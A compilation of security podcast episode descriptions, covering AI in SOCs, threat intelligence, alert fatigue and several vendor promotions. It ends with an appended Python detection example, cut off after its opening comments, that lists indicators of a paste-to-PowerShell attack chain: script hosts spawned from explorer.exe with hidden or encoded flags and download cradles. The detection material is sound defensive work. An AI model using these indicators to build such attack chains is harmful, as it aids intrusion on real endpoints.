During a recent pre-event chat with ITSPmagazine's Sean Martin and Marco Ciappelli, Edward explained the core philosophy behind the platform. Unlike hype-driven claims of “fully autonomous SOCs,” Dropzone takes a practical, tiered approach to automation. Their agentic AI system performs full investigations, determines the nature of alerts (true vs. false positives), and recommends or executes containment actions depending on risk tolerance and policy.

The tech has found particular traction with lean security teams, or those expanding toward 24/7 coverage without adding headcount. Rather than replacing humans, the platform augments them—freeing analysts from the drudgery of low-priority alert triage and giving them space to focus on strategic work. As Edward put it, “Nobody wants to be a tier-one analyst forever.” Dropzone helps make sure they don't have to be.

The platform integrates across existing security stacks and data sources, drawing from threat intel, logs, and endpoint signals to build a full picture of every alert. Security teams retain full control, with human-in-the-loop decision-making remaining the standard in most use cases. However, for low-risk assets and off-hours scenarios, some customers are already authorizing autonomous action.

With conversations at Black Hat expected to revolve around the reality of AI in production—not just the vision—Dropzone is entering the perfect arena. From demonstrating real-world impact to sharing insights on agentic design and trust boundaries, their presence will resonate with everyone from analysts to CISOs.

Whether you're building out your SOC, questioning your MDR provider, or simply overwhelmed with alert fatigue, this may be your signal. Dropzone AI isn't selling buzzwords. They're delivering results. Visit them at Startup City, booth #6427, and see for yourself what the future of alert triage and SOC efficiency looks like—one investigation at a time.

Note: This story contains promotional content.

Guests: Edward Wu, Founder/CEO at Dropzone AI | On LinkedIn: https://www.linkedin.com/in/edwardxwu/ | DROPZONE AI: https://itspm.ag/dropzoneai-641

Hosts: Sean Martin, Co-Founder at ITSPmagazine | Website: https://www.seanmartin.com
Marco Ciappelli, Co-Founder at ITSPmagazine | Website: https://www.marcociappelli.com

Resources
Visit the DROPZONE Website to learn more: https://itspm.ag/dropzoneai-641
Learn more and catch more stories from Dropzone on ITSPmagazine: https://www.itspmagazine.com/directory/dropzoneai
Learn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programs
Newsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/
Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-up
Are you interested in telling your story? https://www.itspmagazine.com/telling-your-story
For episode 546 of the BlockHash Podcast, host Brandon Zemp is joined by Hugh Njemanze, Founder and President of Anomali. Hugh brings over 30 years of experience in enterprise software, having co-founded ArcSight and served as its CTO and EVP of R&D. He later led engineering for HP’s Enterprise Security Products group following ArcSight’s acquisition. Hugh has also served as an advisor at Kleiner Perkins and held senior roles at Verity and Apple, where he helped architect the Data Access Language (DAL).

⏳ Timestamps:
0:00 | Introduction
1:03 | Who is Hugh Njemanze?
4:28 | What is Anomali?
9:12 | Anomali Products & ThreatStream
18:23 | Evolution of AI in Security Operations
20:28 | Anomali client use-cases
24:15 | Future of Threat Intelligence
31:30 | Anomali’s typical client
32:35 | Anomali roadmap 2025
34:10 | Anomali website, socials & demos
Zak Krider, Trellix's Director of Strategy and AI, shares how Trellix has successfully integrated generative AI into their security operations and democratized access to AI models across the organization.

Topics Include:
Trellix formed from McAfee Enterprise and FireEye merger
Provides full security stack visibility in a single platform
Serves SMBs to Fortune 500 and government customers
Used machine learning for two decades with 30 models
Recently pivoted to generative AI with the Trellix Wise platform
AI finds critical events among thousands of daily alerts
Incorporates threat hunting knowledge into AI prompt structures
Amazon Bedrock central to AI strategy for model flexibility
Formed small tiger team to investigate generative AI
Anthropic Claude provided breakthrough "aha moments" for capabilities
Adopted "fail fast, learn fast" innovation culture approach
Enabled employee access to models through the Bedrock API
Conducted innovation jam sessions with VC-style pitches
AI decoded Base64 without prompting, identified benign activity
Junior analysts elevated to level two with AI
Common misconception (false): that the models train on customer data
Early challenge: providing too much data overwhelmed models
Smaller models hallucinated more, with plausible-sounding responses
Design partner programs help prioritize product development
Democratize AI access beyond just technical teams
Test multiple models for specific use cases
Large models work better than small ones initially
Prompt engineering crucial for effective model communication
Model Context Protocol will gain traction next year
Backend data security remains a largely unsolved challenge
Federal customers require on-premises, air-gapped AI solutions

Participants: Zak Krider – Director of AI and Innovation, Trellix

Further Links:
Website: https://www.trellix.com
Trellix on AWS Marketplace
See how Amazon Web Services gives you the freedom to migrate, innovate, and scale your software company at https://aws.amazon.com/isv/
In episode 142 of Cybersecurity Where You Are, Sean Atkinson is joined by Anthony Essmaker, former Product Marketing Manager at the Center for Internet Security® (CIS®); and Randy Rose, VP of Security Operations & Intelligence at CIS. Together, they discuss the nuanced, empathetic approach that's required to help U.S. State, Local, Tribal, and Territorial (SLTT) government organizations to address their cybersecurity needs.

Here are some highlights from our episode:
01:10. What the acronym "SLTT" means to CIS's operational mission
05:39. Using a flexible approach to support the different cybersecurity needs of the 50 states
09:43. How different resources and experiences contextualize "best practices" at the local level
11:49. Trivia question: Which two U.S. states don't have counties?
13:20. The complexity of cybersecurity challenges and resources for U.S. tribal entities
20:11. A 20-year history of working with U.S. SLTTs to meet them where they are
21:30. Relationships as the bedrock for a community model of SLTT cyber defense
26:29. Geographical isolation and other factors affecting U.S. territories' cybersecurity needs
32:42. A closing fun fact about the first U.S. fire district

Resources
Episode 123: An Operational Playbook for Security Impact
The CIS Security Operations Center (SOC): The Key to Growing Your SLTT's Cyber Maturity
2024 MS-ISAC Tribal Sector Cybersecurity Report
Multi-State Information Sharing and Analysis Center®
Nationwide Cybersecurity Review (NCSR)

If you have some feedback or an idea for an upcoming episode of Cybersecurity Where You Are, let us know by emailing podcast@cisecurity.org.
Join us every Friday as we delve into the dynamic world of information security, exploring its defensive side with seasoned professionals from across the industry. Our aim is simple yet ambitious: to foster a collaborative space where ideas flow freely, experiences are shared, and knowledge expands.Each week, we bring you a different expert guest who will share their invaluable insights on topics ranging from threat hunting and incident response to security operations and detection engineering. What makes these sessions special is their informal and interactive nature, allowing for an engaging dialogue between our guests, hosts, and the audience.You can sign up to join us for the live sessions at limacharlie.io/defender-fridays
In this episode, LTC Pete Guerdan (Special Operations Recruiting Battalion Commander) and MAJ Jim Maicke speak with Ambassador Andrew Young about the vital role our ARSOF Operators play in U.S. Embassies and how they enhance our strategic partnerships around the globe.
On this episode of the Cybersecurity Defenders Podcast we speak with Filip Stojkovski, Staff Security Engineer at Snyk.Filip is a cybersecurity professional with over 15 years of experience. He began his career as a SOC analyst and now leads SecOps engineering at Snyk. Filip also advises organizations on SOAR, AI for SOC, and threat intelligence strategies. He holds multiple SANS certifications, including GSTRT, GCTI, and GCFA, and was recognized as “Threat Seeker of the Year.” He is the creator of the LEAD Threat Intelligence Framework and the Security Automation Development Life Cycle. Filip regularly shares his expertise through industry talks and on his blog: Cyber Security Automation and Orchestration
In this episode of Blueprint, host John Hubbard sits down with James Spiteri from Elastic to explore the transformative power of AI on the SOC. They delve into how advanced AI technologies, such as agentic AI models, the Model Context Protocol (MCP), and automation, are reshaping the SOC landscape. Discover how AI enhances SOC efficiency, reduces mundane tasks, and integrates context-aware capabilities. Learn about the real-world applications, from automation in cybersecurity operations to the challenges and promises of large language models. This discussion covers the ethical considerations, potential risks, and the promising future of SOCs powered by AI. Tune in to get inspired and see how AI might revolutionize your cyber defense strategies.

Check out John's SOC Training Courses for SOC Analysts and Leaders: SEC450: Blue Team Fundamentals - Security Operations and Analysis; LDR551: Building and Leading Security Operations Centers. Follow and Connect with John: LinkedIn
Summary: In this episode of the PIO Podcast, Stephen Kuhr shares his extensive experience in emergency management, discussing his journey from the New York City Emergency Medical Service to his role at Colorado Springs Utilities. He emphasizes the importance of crisis communication, the differences between public and private sector emergency management, and the critical lessons learned throughout his career. Stephen highlights the need for transparency and effective communication during crises, and he shares practical insights on integrating crisis communications into emergency management plans.

Steven's BIO: Steven Kuhr has spent his career in Emergency Management, building a diverse portfolio of leadership positions across multiple sectors. Mr. Kuhr served as Director of Emergency Management, Enterprise Continuity, and Security Operations at Colorado Springs Utilities. While serving in this position, Mr. Kuhr oversaw crisis, risk, and resiliency operations for energy and water utilities and dam operations for Colorado's second largest city. During this time, Mr. Kuhr also served as a Director with InfraGard-Denver and co-founded the Colorado Critical Infrastructure Alliance.

Earlier, Mr. Kuhr served with the New York City Office of Emergency Management as a founding Deputy Commissioner, leading emergency operations and multi-risk emergency planning. Prior to that he served with the New York City Fire Department as EMS Deputy Chief and Special Operations Commander. Mr. Kuhr is a trusted Crisis Management Leader. He has advised elected officials, CEOs and “C-Suite” Leaders during complex emergencies, major disasters, and terrorist attacks. Mr. Kuhr is also a respected consultant, serving as Managing Director and Emergency Management Practice Leader at Kroll Inc., and President and Chief Operating Officer at Strategic Emergency Group LLC. Mr. Kuhr has advised a variety of organizations in several business industries and government sectors, including federal, state, and local government agencies, transportation (rail, aviation, seaport, and surface), financial, energy (electricity/natural gas), water/wastewater, dams, major league baseball, cable news, commercial properties, defense, justice, law enforcement, and an agency serving people with disabilities and special needs.

Our premiere sponsor, Social News Desk, has an exclusive offer for PIO Podcast listeners. Head over to socialnewsdesk.com/pio to get three months free when a qualifying agency signs up.
In this episode of Data Security Decoded, join Caleb Tolin as he sits down with Grant Oviatt, Head of Security Operations at Prophet Security, to explore the transformative impact of AI agents in SOC environments. From reducing false positives by 95% to dramatically improving incident response times, discover how AI is augmenting human analysts rather than replacing them. Whether you're a CISO looking to optimize your security operations or a SOC analyst concerned about AI's impact on your role, this episode offers practical insights into successfully implementing AI-driven security solutions while building trust in automated systems. • Learn how AI agents handle tedious security tasks, freeing analysts for strategic work • Explore real-world success stories of AI-powered threat detection and response • Understand the critical balance between AI automation and human expertise • Get practical steps for deploying AI agents in your SOC
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Matt Muller, Field CISO at Tines. With over a decade of experience at companies like Material Security, Coinbase, and Inflection, Matt's got a strong track record of scaling SecOps teams, building threat detection and mitigation programs, and driving trust and safety initiatives. His knowledge impressed Thomas and the Tines team so much that they invited him to become the company's first Field CISO. In this episode: [02:41] The origins of Matt's insatiable appetite for all things security [04:05] Matt's path from business degree to Director of Trust at Inflection [07:07] Scaling Coinbase's security team from 3 to 50 [08:41] Addressing security's long-standing communication problem [10:55] Why “failure wasn't an option” when managing risk at Coinbase [14:14] What led Matt to a product role on Material Security's phishing protection team [17:31] Building what customers ask for vs. actually solving their problems [21:14] How Matt stays up to date with industry developments [22:35] Matt's favorite use cases for security automation [25:25] Matt's go-to automation best practices [27:33] Cutting through AI hype to drive meaningful adoption [30:32] How Matt keeps himself honest as a Field CISO [32:21] Why the traditional SOC is broken - and what needs to change [35:30] The role of diverse hiring in building a resilient security strategy [39:00] What security teams will look like in 2030 [41:35] How CISOs are evolving to become chief risk advisors to the business [43:30] Connect with Matt Where to find Matt: LinkedIn Building SecOps newsletter Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: Blue Team Con Material Security's Ryan Noon on the Future of Security Operations podcast
Guests: Eric Foster, CEO of Tenex.AI; Venkata Koppaka, CTO of Tenex.AI

Topics: Why is your AI-powered MDR special? Why start an MDR from scratch using AI? So why should users bet on an “AI-native” MDR instead of an MDR that has already got its act together and is now applying AI to an existing set of practices? What's the current breakdown in labor between your human SOC analysts vs your AI SOC agents? How do you expect this to evolve, and how will that change your unit economics? What tasks are humans uniquely good at in today's SOC? How do you expect that to change in the next 5 years? We hear concerns about SOC AI missing things, but we know humans miss things all the time too. So how do you manage buyer concerns about the AI agents missing things? Let's talk about how you're helping customers measure your efficacy overall. What metrics should organizations prioritize when evaluating MDR?

Resources: Video; EP223 AI Addressable, Not AI Solvable: Reflections from RSA 2025 (quote from Eric in the title!); EP10 SIEM Modernization? Is That a Thing?; Tenex.AI blog; “RSA 2025: AI's Promise vs. Security's Past — A Reality Check” blog; The original ASO 10X SOC paper that started it all (2021); “Baby ASO: A Minimal Viable Transformation for Your SOC” blog; “The Return of the Baby ASO: Why SOCs Still Suck?” blog; "Learn Modern SOC and D&R Practices Using Autonomic Security Operations (ASO) Principles" blog
Podcast: OT Security Made Simple
Episode: How to build a SIEM SOC in OT? | OT Security Made Simple
Pub date: 2025-05-22
Zeek Muratovic, Director of Security Operations at Landis+Gyr, talks about the first steps to build a SIEM-based SOC in OT environments. Being a pragmatist, he proposes a step-by-step approach that keeps OT operators from overspending their budget and overloading their teams.
In today's episode of the Cyber Culture Café series, Andy and John speak to Ciaran Luttrell, VP of Global Security Operations. As the VP, Global Security Operations, Ciaran began our European HQ and Security Operations Centre in Cork, Ireland in 2015, and led its initial setup and continued growth to form part of a best-of-breed 24/7/365 Global SOC function with 150 team members. He is responsible for all of eSentire's SOC teams with a focus on strategic direction and execution of continuous improvement initiatives across people, processes and technology. --Cybersecurity isn't just about platforms and processes—it's about people. If relationships matter in cybersecurity, this is where they begin. So, we're introducing a new, breakout series from the eSentire Cyber Talks Podcast – the Cyber Culture Café series! In this series, John Moretti and Andy Lalaguna will sit down for a candid conversation with one of the key players behind the eSentire customer experience. This series is all about pulling back the curtain and putting the spotlight on the people who power eSentire's world-class cybersecurity services.Join us for a relaxed and revealing discussion covering day-to-day challenges, personal motivation, industry observations, and the unique value each guest brings to the eSentire mission. Get to know the voices behind the protection—and why our people are at the core of everything we do.--Have a question for us? Reach out: hello@esentire.com---About Cyber TalksFrom ransomware attacks to supply chain compromises, eSentire's Cyber Talks podcast will delve into the world of the latest cyber threats that are impacting businesses globally. 
Join our team of security experts as we speak with C-level executives and security practitioners about the cyber risks affecting their business and how they're addressing these challenges.About eSentireeSentire, Inc., the Authority in Managed Detection and Response (MDR), protects the critical data and applications of 2000+ organizations in 80+ countries, across 35 industries from known and unknown cyber threats by providing Exposure Management, Managed Detection and Response and Incident Response services designed to build an organization's cyber resilience & prevent business disruption. Founded in 2001, eSentire protects the world's most targeted organizations with 65% of its global base recognized as critical infrastructure, vital to economic health and stability. By combining open XDR platform technology, 24/7 threat hunting, and proven security operations leadership, eSentire's award-winning MDR services and team of experts help organizations anticipate, withstand and recover from cyberattacks. For more information, visit www.esentire.com and follow @eSentire.
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Travis Howerton, Co-founder and CEO of RegScale. Travis began his security career with roles at government and regulated organizations, including the National Nuclear Security Administration and Oak Ridge National Laboratory, before being inspired by inefficiencies in compliance processes to co-found RegScale. As CEO of RegScale, he oversees their Continuous Controls Monitoring platform, which enables rapid GRC outcomes for organizations like Wiz, Keybank, and the US Department of Energy. In this episode: [02:15] How an interest in computer science led Travis to pursue a career in security [03:20] Working in “the Major Leagues of cyber” at the National Nuclear Security Administration [06:20] Moving fast in highly-regulated environments [07:10] Securing the world's fastest supercomputer at Oak Ridge National Laboratory [10:30] Supporting digital transformation at enormous scale at Bechtel Corp [15:15] How outdated compliance processes inspired Travis to co-found RegScale [18:15] How RegScale acquired its first high-profile clients through "hustle and luck" [19:20] The challenges of building the first version of RegScale [21:15] Taking the pain out of compliance [23:20] The biggest GRC roadblocks teams are facing right now [25:10] Practical advice for moving the needle on your automation program [27:33] Eliminating redundancy and inefficiency in federal compliance programs [32:30] What's next for RegScale [33:45] The best applications of AI (and which decisions should "never" be made by AI) [35:45] Navigating regulatory uncertainty when it affects your whole business model [38:40] What SecOps and compliance teams might look like in the future [40:20] What the best compliance teams do to build rapport with security, IT and other business functions [43:30] Why AI adoption is a risk-based conversation every organization should be having with their CISO [46:00] Connect with Travis Where to find Travis Howerton: LinkedIn RegScale Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: The CISO Society 2025 State of Continuous Control Monitoring Report
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Raymond Schippers. With 15 years of experience leading detection and response teams, Raymond is a seasoned security leader with high-impact roles at Check Point and Canva under his belt. He recently became co-founder of Huntabil.IT, a Melbourne-based company providing organizations with tailored advisory services to align with their unique threat landscapes and business goals. In this episode: [02:27] Landing his first security internship at Siemens as a teenager [03:18] Reflecting on some state-sponsored attacks he encountered while working IR at Check Point [04:45] Working with government partners to attribute and dismantle APTs [08:10] The challenges of remediating threats for anonymized customers [09:30] What inspired Raymond's move from Check Point to Canva [10:35] Building Canva's blue team during the company's phase of hypergrowth [12:40] Rethinking the interview process to prioritize diversity in hiring [18:02] Proven strategies for reducing burnout and alert fatigue in IR [21:09] How Raymond's team used automation to scale security operations at Canva [23:16] The state of AI in security - and its most effective use cases [28:53] What inspired Raymond to found Huntabil.IT [31:09] Raymond's approach to working with non-profit organizations [39:15] The under-reported threats that could reshape the future of SecOps [44:06] Anticipating the biggest challenges security teams will face over the next five years [46:42] Connect with Raymond Where to find Raymond Schippers: LinkedIn Huntabil.IT Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: Cyber Threat Alliance Raymond's talk on avoiding team burnout at BSides Perth
Dr. Kashyap "Kash" Thimmaraju joins the show to talk about a new study on burnout, wellbeing, and flow state in security operations. George K and George A talk to Kash about: New research using psychologically validated scales to measure burnout in cybersecurity professionals; how "flow state" might be the key to better performance AND preventing burnout; the impact of remote work and isolation on security teams; practical techniques security leaders can implement TODAY to support their teams. Protecting our human resources is just as important as protecting our digital ones. Dr. Thimmaraju and his co-authors' research points to a significant gap in how we understand and support the mental wellbeing of security professionals. It's time to start changing that conversation. Mentioned this episode: Human Performance in Cybersecurity Operations Paper: https://flowguard-institute.com/wp-content/uploads/2025/03/Human-Performance-in-Security-Operations.pdf Human performance in cybersecurity survey: http://flowguard-institute.com/hpcs Flow Guard Institute: http://flowguard-institute.com
In episode 134 of Cybersecurity Where You Are, Sean Atkinson is joined by Randy Rose, VP of Security Operations & Intelligence at the Center for Internet Security® (CIS®); and Timothy Davis, Lead Cyber Threat Intelligence (CTI) Analyst at CIS. Together, they discuss how generative artificial intelligence (GenAI) lowers the barrier to entry for cyber threat actors (CTAs). Here are some highlights from our episode: 01:37. CTAs' use of GenAI to improve their existing campaigns 03:38. The need for CTI teams to look beyond language in analyzing GenAI-enabled threats 07:22. The evolving impact of GenAI on phishing campaigns, malware development, deepfakes, and malicious Artificial Intelligence as a Service (AIaaS) offerings 12:28. How GenAI increases the speed at which CTAs can scale their efforts 17:29. Technical barriers and other limitations that shape CTAs' use of GenAI 22:46. A historical perspective of AI-enabled cybersecurity and how GenAI can support cybersecurity awareness training 26:50. The cybersecurity benefits of AI and machine learning (ML) capabilities for clustering data 29:05. What the future might hold for GenAI from an offensive and defensive perspective. Resources: The Evolving Role of Generative Artificial Intelligence in the Cyber Threat Landscape; Episode 89: How Threat Actors Are Using GenAI as an Enabler; Episode 95: AI Augmentation and Its Impact on Cyber Defense; 12 CIS Experts' Cybersecurity Predictions for 2025; CIS Critical Security Controls®; Multi-State Information Sharing and Analysis Center®. If you have some feedback or an idea for an upcoming episode of Cybersecurity Where You Are, let us know by emailing podcast@cisecurity.org.
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Dane VandenBerg. Dane's 16-year security career includes product-focused roles with vendors like Qintel and, more recently, Microsoft, where he was Principal Technical Specialist supporting the development of their Security Copilot. He's also spent a lot of time in fintech, serving as Vice President of Information Security at Prime Trust and, currently, Senior Director of Security Operations at Circle. In this episode: [02:05] How Dane went from researching women's health and animal cloning to public relations to security [06:25] Why security teams are still fighting the same battles they were 15 years ago [09:24] How Dane's vendor-side threat intel work shapes his thinking as a SecOps leader [12:00] What's working - and what's not - about how companies approach threat intelligence today [12:51] Why threat intel should be an in-house function, not just a reporting feed [15:30] What motivated Dane to move into the finance and crypto industry [19:30] How parenthood reshaped the way Dane thinks about risk [22:50] Tips for encouraging employees to report their security concerns [26:00] What a great security-vendor customer experience looks like - and what too many vendors get wrong [29:10] The security tools and solutions Dane is most excited about right now [32:45] Balancing the hype and potential of security copilots [38:30] What cyberattacks might look like five years from now [41:30] Connect with Dane Where to find Dane: LinkedIn Circle Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: National Cyber Forensics and Training Alliance
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Josh Lemos, CISO at GitLab. Throughout his 15-year career in security, Josh has led teams at ServiceNow, Cylance, and Square. Known for his expertise in AI-driven security strategies, Josh is also a board member with HiddenLayer. He drives innovation at GitLab with a relentless focus on offensive security, identity management, and automation. In this episode: [02:05] His early career path from mechanic to electrical engineer to security leader [03:35] Josh's philosophy on hiring and mentoring, plus his tips for creating networking opportunities [05:30] How he applies technical foundations from his practitioner days to his work as CISO [07:40] Building product security at ServiceNow from the ground up [10:40] “Down and in” versus “up and out” - adopting a new leadership style as CISO at Square [12:17] Josh's experience as an early AI and security researcher at Cylance [16:15] What's surprised Josh most about the evolution of AI [18:50] Why Josh calls today's models “AI version 1.0” - and what he thinks it will take to upgrade to version 2.0 [22:45] The LLM security threats Josh is most worried about, as a board member with HiddenLayer [26:30] “Expressing exponential value” - what excited Josh most about becoming CISO at GitLab [27:45] Why GitLab prioritizes “intentional transparency” [32:45] How GitLab automates and orchestrates its Tier 1 and Tier 2 security processes [34:10] How GitLab's security team uses GitLab internally [37:35] The secret to recruiting, hiring, and managing a remote, global team [39:45] The importance of in-person collaboration for building trust and connection [41:45] Downsizing, bootstrapping, and problem-solving: Josh's predictions for the future of SecOps [46:10] Connect with Josh Where to find Josh: LinkedIn GitLab Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: GitLab's Security Handbook GitLab's GUARD Framework Netskope's security blog Jobs at GitLab Haroon Meer
Are you struggling to help SOC teams move beyond alert fatigue and scale investigations effectively? Curious how innovative startups are transforming security operations by empowering analysts, not just automating them? Wondering what truly sets apart the next wave of cybersecurity platforms—and what you can learn from their go-to-market approach? This episode delivers deep insight and practical lessons from the cutting edge of security operations.In this conversation we discuss:
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Mark Hillick, CISO at Brex. Mark's experience in the security industry spans more than two decades. He started out as a security engineer at Allied Irish Banks before advancing through companies like MongoDB to become Director and Head of Security at Riot Games. His book, The Security Path, features over 70 interviews with security professionals on their career journeys. In this episode: [02:06] His early career journey - from a mathematics background to building early online banking systems [03:32] What's kept Mark excited about security for over two decades [04:40] The compound benefits of growing within a company over time [07:20] Mark's leadership style - defined by transparency, directness, and genuine care for his teammates [12:45] Communicating the business trade-off between risk and return [16:45] Reflecting on the team's response to major incidents at Riot Games [21:00] The unique challenges of securing gaming platforms [26:30] How Mark approaches strategy and planning in the fintech space [28:08] The case for building strong, partnership-driven vendor relationships [31:13] Creating space for creativity - without spreading the team too thin [34:35] Empowering his team to speak openly - even if it means calling him out [36:35] The inspiration behind Mark's books Digital Safety for Parents and The Security Path [40:20] Connect with Mark Where to find Mark: LinkedIn Brex Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: The Security Path - click here to redeem a free copy for podcast listeners (first come, first served) Digital Safety for Parents - click here to redeem a free copy for podcast listeners (first come, first served) Mark's talk during his time at Riot Games in 2016
We're on the road to RSAC 2025 — or maybe on a quantum-powered highway — and this time, Sean and I had the pleasure of chatting with someone who's not just riding the future wave, but actually building it. Marc Manzano, General Manager of the Cybersecurity Group at SandboxAQ, joined us for this Brand Story conversation ahead of the big conference in San Francisco. For those who haven't heard of SandboxAQ yet, here's a quick headline: they're a spin-out from Google, operating at the intersection of AI and quantum technologies. Yes — that intersection. But let's keep our feet on the ground for a second, because this story isn't just about tech that sounds cool. It's about solving the very real, very painful problems that security teams face every day. Marc laid out their mission clearly: Active Guard, their flagship platform, is built to simplify and modernize two massive pain points in enterprise security — cryptographic asset management and non-human identity management. Think: rotating certificates without manual effort. Managing secrets and keys across cloud-native infrastructure. Automating compliance reporting for quantum-readiness. No fluff — just value, right out of the box. And it's not just about plugging a new tool into your already overloaded stack. What impressed us is how SandboxAQ sees themselves as the unifying layer — enhancing interoperability across existing systems, extracting more intelligence from the tools you already use, and giving teams a unified view through a single pane of glass. And yes, we also touched on AI SecOps — because as AI becomes a standard part of infrastructure, so must security for it. Active Guard is already poised to give security teams visibility and control over this evolving layer. Want to see it in action? Booth 6578, North Expo Hall. Swag will be there. Demos will be live. Conversations will be real. We'll be there too — recording a deeper Brand Story episode On Location during the event. Until then, enjoy this preview — and get ready to meet the future of cybersecurity.
⸻
Keywords: sandboxaq, active guard, rsa conference 2025, quantum cybersecurity, ai secops, cryptographic asset management, non-human identity, cybersecurity automation, security compliance, rsa 2025, cybersecurity innovation, certificate lifecycle management, secrets management, security operations, quantum readiness, rsa sandbox, cybersecurity saas, devsecops, interoperability, digital transformation
______________________
Guest: Marc Manzano, General Manager of the Cybersecurity Group at SandboxAQ
Marc Manzano on LinkedIn
At this year's RSAC Conference, the team from ThreatLocker isn't just bringing tech—they're bringing a challenge. Rob Allen, Chief Product Officer at ThreatLocker, joins Sean Martin and Marco Ciappelli for a lively pre-conference episode that previews what attendees can expect at booth #854 in the South Expo Hall. From rubber ducky hacks to reframing how we think about Zero Trust, the conversation highlights the ways ThreatLocker moves beyond the industry's typical focus on reactive detection. Allen shares how most cybersecurity approaches still default to allowing access unless a threat is known, and why that mindset continues to leave organizations vulnerable. Instead, ThreatLocker's philosophy is to “deny by default and permit by exception”—a strategy that, when managed effectively, provides maximum protection without slowing down business operations. ThreatLocker's presence at the conference will feature live demos, short presentations, and hands-on challenges—including their popular Ducky Challenge, where participants test whether their endpoint defenses can prevent a rogue USB (disguised as a keyboard) from stealing their data. If your system passes, you win the rubber ducky. If it doesn't? They (temporarily) get your data. It's a simple but powerful reminder that what you think is secure might not be. The booth won't just be about tech. The team is focused on conversations—reconnecting with customers, engaging new audiences, and exploring how the community is responding to a threat landscape that's growing more sophisticated by the day. Allen emphasizes the importance of in-person dialogue, not only to share what ThreatLocker is building but to learn how security leaders are adapting and where gaps still exist. And yes, there will be merch—high-quality socks, t-shirts, and even a few surprise giveaways dropped at hotel doors (if you resist the temptation to open the envelope before visiting the booth). For those looking to rethink endpoint protection or better understand how proactive controls can complement detection-based tools, this episode is your preview into a very different kind of cybersecurity conversation—one that starts with a challenge and ends with community.
Learn more about ThreatLocker: https://itspm.ag/threatlocker-r974
Guest: Rob Allen, Chief Product Officer, ThreatLocker | https://www.linkedin.com/in/threatlockerrob/
Resources
Learn more and catch more stories from ThreatLocker: https://www.itspmagazine.com/directory/threatlocker
Learn more and catch more stories from RSA Conference 2025 coverage: https://www.itspmagazine.com/rsa-conference-usa-2025-rsac-san-francisco-usa-cybersecurity-event-infosec-conference-coverage
______________________
Keywords: rsac conference, cybersecurity, endpoint, zero trust, rubber ducky, threat detection, data exfiltration, security strategy, deny by default, permit by exception, proactive security, security demos, usb attack, cyber resilience, network control, security mindset, rsac 2025, event coverage, on location, conference
____________________________
Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverage
To see and hear more Redefining CyberSecurity content on ITSPmagazine, visit: https://www.itspmagazine.com/redefining-cybersecurity-podcast
To see and hear more Redefining Society stories on ITSPmagazine, visit: https://www.itspmagazine.com/redefining-society-podcast
Want to tell your Brand Story Briefing as part of our event coverage? Learn More
LevelBlue's latest Threat Trends Report pulls no punches: phishing, malware, and ransomware attacks are not just continuing—they're accelerating. In this episode of ITSPmagazine's Brand Story podcast, hosts Sean Martin and Marco Ciappelli are joined by Kenneth Ng, a threat hunter and lead incident responder on LevelBlue's Managed Detection and Response (MDR) team, to unpack the findings and recommendations from the report.

Phishing as a Service and the Surge in Email Compromises
One of the most alarming trends highlighted by Kenneth is the widespread availability of Phishing-as-a-Service (PhaaS) kits, including names like RaccoonO365, Mamba 2FA, and Greatness. These kits allow attackers with little to no technical skill to launch sophisticated campaigns that bypass multi-factor authentication (MFA) by hijacking session tokens. With phishing attacks now leading to full enterprise compromises, often through seemingly innocuous Microsoft 365 access, the threat is more serious than ever.

Malware Is Smarter, Simpler—and It's Spreading Fast
Malware, particularly fake browser updates and credential stealers like Lumma Stealer, is also seeing a rise in usage. Kenneth points out the troubling trend of malware campaigns that rely on basic user interactions—like copying and pasting text—leading to full compromise through PowerShell or command prompt access. Basic group policy configurations (like blocking script execution for non-admin users) are still underutilized defenses.

Ransomware: Faster and More Automated Than Ever
The speed of ransomware attacks has increased dramatically. Kenneth shares real-world examples where attackers go from initial access to full domain control in under an hour—sometimes in as little as ten minutes—thanks to automation, remote access tools, and credential harvesting. This rapid escalation leaves defenders with very little room to respond unless robust detection and prevention measures are in place ahead of time.

Why This Report Matters
Rather than presenting raw data, LevelBlue focuses on actionable insights. Each major finding comes with recommendations that can be implemented regardless of company size or maturity level. The report is a resource not just for LevelBlue customers, but for any organization looking to strengthen its defenses. Be sure to check out the full conversation and grab the first edition of the Threat Trends Report ahead of LevelBlue's next release this August—and stay tuned for their updated Futures Report launching at RSA Conference on April 28.
Learn more about LevelBlue: https://itspm.ag/levelblue266f6c
Note: This story contains promotional content. Learn more.
Guest: Kenneth Ng, threat hunter and lead incident responder on LevelBlue's Managed Detection and Response (MDR) team | On LinkedIn: https://www.linkedin.com/in/ngkencyber/
Resources
Download the LevelBlue Threat Trends Report | Edition One: https://itspm.ag/levelbyqdp
Learn more and catch more stories from LevelBlue: https://www.itspmagazine.com/directory/levelblue
Learn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programs
Newsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/
Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-up
Are you interested in telling your story? https://www.itspmagazine.com/telling-your-story
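The copy-and-paste-to-PowerShell chain Kenneth describes leaves a distinctive trace on the endpoint: a script host (powershell.exe, mshta.exe, cmd.exe) spawned directly from explorer.exe, usually with a hidden-window or encoded-command flag and a download cradle in the command line. The following Python is an added example, not code from LevelBlue or from the podcast. It runs a small triage rule over constructed Sysmon-style process-creation events; the field names (Image, ParentImage, CommandLine, User), the explorer.exe parent check and the indicator list are assumptions for illustration, and all four sample events are made up. It is the detection-side complement to the group policy prevention mentioned above, for hosts where script execution is not yet blocked.

```python
import base64
import binascii
import ntpath
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Event 0 is a paste-to-run chain: explorer.exe launching hidden, encoded
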